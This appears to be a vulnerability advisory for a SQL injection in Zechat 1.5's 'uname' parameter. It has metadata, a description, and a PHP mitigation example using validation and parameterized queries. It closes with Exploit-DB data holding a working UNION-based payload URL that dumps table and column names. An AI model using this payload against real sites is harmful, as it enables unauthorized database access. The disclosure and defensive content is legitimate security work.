Vendor: Zechat
By: Ihsan Sencan
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Zechat
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:bylancer:zechat
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Zechat 1.5 – ‘uname’ SQL Injection

Zechat 1.5 is vulnerable to SQL injection through the 'uname' parameter. An attacker can exploit the vulnerability by sending a maliciously crafted HTTP request that injects SQL code through 'uname'. This gives the attacker access to the database and the ability to execute arbitrary SQL commands. The proof of concept below uses the make_set() function to extract data from the database.

Mitigation:

The application should validate user input and sanitize it before passing it to the database. The application should also use parameterized queries to prevent SQL injection.
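
The mitigation above, shown as an added example that is not Zechat's own code: an allow-list check on 'uname' followed by a parameterized lookup. The `users` table, its columns, and the function names are hypothetical, and an in-memory SQLite database stands in for the application's real database so the script runs offline.

```php
<?php
declare(strict_types=1);

// Assumed schema: the real Zechat table and column names are not shown on the page.
function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');   // in-memory stand-in for the application's database
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, about TEXT)');
    $pdo->exec("INSERT INTO users (username, about) VALUES ('demo', 'constructed sample row')");
    return $pdo;
}

// Allow-list check: accept only the characters a username can legitimately contain.
function is_valid_uname(string $uname): bool
{
    return preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $uname) === 1;
}

// Hardened lookup: the value is bound as data and never concatenated into the SQL text.
function find_profile(PDO $pdo, string $uname): ?array
{
    if (!is_valid_uname($uname)) {
        return null;                      // reject before touching the database
    }
    $stmt = $pdo->prepare('SELECT id, username, about FROM users WHERE username = :uname');
    $stmt->execute([':uname' => $uname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = open_demo_db();
// Constructed inputs: one legitimate name, one carrying SQL metacharacters.
foreach (['demo', "demo' UNION SELECT 1,2,3-- -"] as $input) {
    $row = find_profile($pdo, $input);
    printf("%-32s => %s\n", $input, $row === null ? 'rejected / not found' : 'profile #' . $row['id']);
}
```

When the same pattern is used with PDO's MySQL driver, set `PDO::ATTR_EMULATE_PREPARES` to `false` so that the statement is prepared on the server rather than assembled client-side.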

Exploit-DB raw data:

# Exploit Title: Zechat 1.5 - 'uname' SQL Injection
# Exploit Author: Ihsan Sencan
# Date: 2018-10-02
# Dork: N/A
# Vendor Homepage: https://bylancer.com/
# Software Link: https://bylancer.com/products/zechat-php-script/index.php
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

https://Target/products/zechat-php-script/profile.php?uname=demo

'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229)--+-